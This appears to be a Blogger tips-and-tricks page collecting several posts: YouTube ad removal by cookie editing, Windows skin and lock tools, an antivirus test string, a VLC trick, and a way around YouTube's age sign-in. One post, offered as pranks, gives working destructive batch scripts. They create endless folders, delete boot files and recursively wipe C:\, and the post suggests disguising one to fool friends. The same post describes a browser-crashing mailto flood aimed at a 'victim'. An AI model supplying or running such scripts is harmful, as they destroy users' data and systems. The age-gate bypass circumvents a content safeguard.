How to Remove Ads on Youtube

0 comments

YouTube conducts experiments with its layout and functionality every now and then. But an average user only notices the updates to its design and not the under the hood updates which makes YouTube better and faster. But nowadays YouTube is experimenting something which everyone will fall in love with, a feature that allows you to block the ads on YouTube officially, by just changing a cookie stored in your browser.
After changing the cookie, the ads on the YouTube’s homepage, inside the YouTube player, in the right pane and the ads in the search results will disappear. It also adds channel cards, a feature which shows information about the channel when you hover over a channel’s name.


Changing the Cookie
Open YouTube in your browser.
Open “Developer Console”. This can be done by pressing keyboard shortcuts. These are browser specific, see below for your browser.

Google Chrome: Hit the “Ctrl+Shift+J” key combination.
Mozilla Firefox: Hit the “Ctrl+Shift+K” key combination.
Opera: Hit the “Ctrl+Shift+J” key combination.
Internet Explorer: Hit the “F12” key and then press the “Ctrl+2” key combination.
Apple Safari: Hit the “Ctrl+Alt+I” key combination. 

This will open “Developer Menu” at the bottom of the browser. Now press the “Esc” key to open the Console window.

NOTE The “Developer Menu” will only open if you have checked the “Show Developer menu in menu bar” check box in the “Preferences > Advanced tab”.


Now, paste the below given code in the “Console” window.

document.cookie="VISITOR_INFO1_LIVE=oKckVSqvaGw; path=/;
domain=.youtube.com";window.location.reload();



Hit the “Enter” key.

This will reload the YouTube page, free of any ads whatsoever.
To enable the ads again, either remove the YouTube cookies entirely or run the below code in the “Console” window.

document.cookie="VISITOR_INFO1_LIVE=; path=/;
domain=.youtube.com";window.location.reload();

NOTE YouTube can stop this experiment anytime they want. Therefore, below are many other ways we can block ads on YouTube.

Plz comment if u have a any difficulties faced...Iam free to gve reply as soon as possible...


Read More..

Download Pattern Lock for Computers

0 comments
Hi friendz..today Iam psoting a simple trick for you..If you use or have used a touch-screen phone, you would have used the pattern lock. A pattern lock is a type of screen lock where you see 9 dots on the screen, arranged in 3 rows and 3 columns. You need to match the dots in the same pattern as you did while setting up the lock. The pattern is almost impossible to guess and hence is reliable to be used as your computer’s locking system.

Eusing Maze Lock

Eusing Maze Lock is a free application that allows you to have pattern locking in Windows. The program works on all Windows machines running Windows XP or later. You can customize the lock in many ways. The default grid is a 3×3, which can be changed to 4×4 and 5×5 for increasing security. See below for full set of features and the customizations it allows.


Features at a Glance

Auto lock the screen when the computer starts up
Lock if the computer is idle for a specific duration
Grid size can be chosen from 3×3, 4×4 and 5×5
It can also disable the internet connection when the computer is locked
You can easily lock the PC by pressing the Hotkey or by clicking the icon in the taskbar
NOTE See the default pattern carefully when you first start the application.
                                                    Download Pattern Lock For PC



Read More..

Turn your windows 7 and 8 into an Android Kit-Kat OS

0 comments
Hi folks..Google a while ago, disclosed the name of its next version of Android and named it KitKat. And in a very short period, someone came up with a transformation pack based on the brown color of KitKat.


The pack not only changes the color theme of your computer, but also transforms it in many ways. It installs a software utility called Rocket Dock, which adds the MacOS type dock at the bottom of the screen. This dock by default has shortcuts/links to Gmail, Google Play Store, My Computer, Control Panel and many other useful locations. The taskbar is placed at the very top, like in MacOS.


The pack changes the system icons with its custom icons. It also installs Ubericon, an application that adds effects when icons and folders are launched. Default cursors are changed to custom ones, to suit the overall look of theme.
Many sidebar widgets are also added, a glimpse of which can be seen in the screenshots. The logon screen is changed and has a nice blue patterned background with glossy look.
The Logon Screen


NOTE The transformation packs are easy to install but leave some files and settings while uninstalling. I recommend you to first make a System Restore point and then go ahead with the installation. You can then restore your computer, in case you don’t like the look of your Windows after installing the transformation pack. If the pack fails to install, try to disable the User Accounts Control

The transformation pack is available both for Windows 7 and Windows 8.

Visit Skin Pack to see more screenshots and to Download KitKat skin pack


                                                                       windows 8
                                                                       windows 7
Read More..

5 Dangerous Virus that your System Crashes Completely

0 comments
SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN!!


1. How to create more than 3,000 folders under a minute
1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually
making hundreds of folders.md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)goto top – return the command to :top, causes an infinite loop.
NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t
suspect the file to be a virus.



2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
DONT RUN THE BATCH FILE , YOU WONT RECOVER BACK AFTER YOURUN IT !!!
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. So please, use this hack only if you have no intention of rebooting your computer again. So just be careful. Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.


3. How to Delete all your system files with a small command!
Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

4. RAM crashing trick open notepad and type
:A
start
http://trickswonder.blogspot.com/
goto A
save with .bat extension.
Infinitely loops your browser to open up
http://trickswonder.blogspot.com/

5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.
WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!! Click Here

NOTE: Try at your own risk WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!
Read More..

How to know Is your antivirus software working perfectly or not ?

0 comments



               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

First open Notepad and copy below code into it.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

 Save the file as virus.exe on your desktop


         As soon as you will run this file with your antivirus, if it detect virus then it is working perfectly. If not then you need to change your program.

Plz comment about this post...ThanQ for Visiting
Read More..

Simple VLC Media Player Trick that Surprises you

0 comments

In this tutorial i will share a simple trick yet interesting trick i came across while surfing on the internet. I will call it VLC Inception trick. This trick is simple and works on windows xp as well as windows 7. If you know this trick then its great if you don't then lets dive into it.

How To Do This Trick ?

  • Open Vlc Media Player.
  • Then Press Cltr + N
  • Now Type "Screen://" (without quotes)
  • Click on Play and watch this simple little trick.
Leave a comment..

Read More..

How to Watch 18+ Videos On Youtube Without Signing In

0 comments


Hi guys..Sometimes its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easy for you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started.

How To Watch 18+ Youtube Videos Without Logging In ?

1. First get the Url of video you want to watch. As shown below.

                         http://www.youtube.com/watch?v=4Xkh6j7RMqk 

2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk

3. Now paste the Video Id in the link given below.

                        http://www.youtube.com/v/VideoId?fs=1

      Replace VideoId with the Id you copied in Step 2

4. Now the url will become as shown below.

                      http://www.youtube.com/v/4Xkh6j7RMqk?fs=1


5. Done.

Plz comment about this post...
Read More..
Icon Icon Icon Follow Me on Google Plus

Copyright 2011 All Rights Reserved / Privacy Policy / Sitemap / Contact Us

Template by / TricksWonder / Powered by / Blogger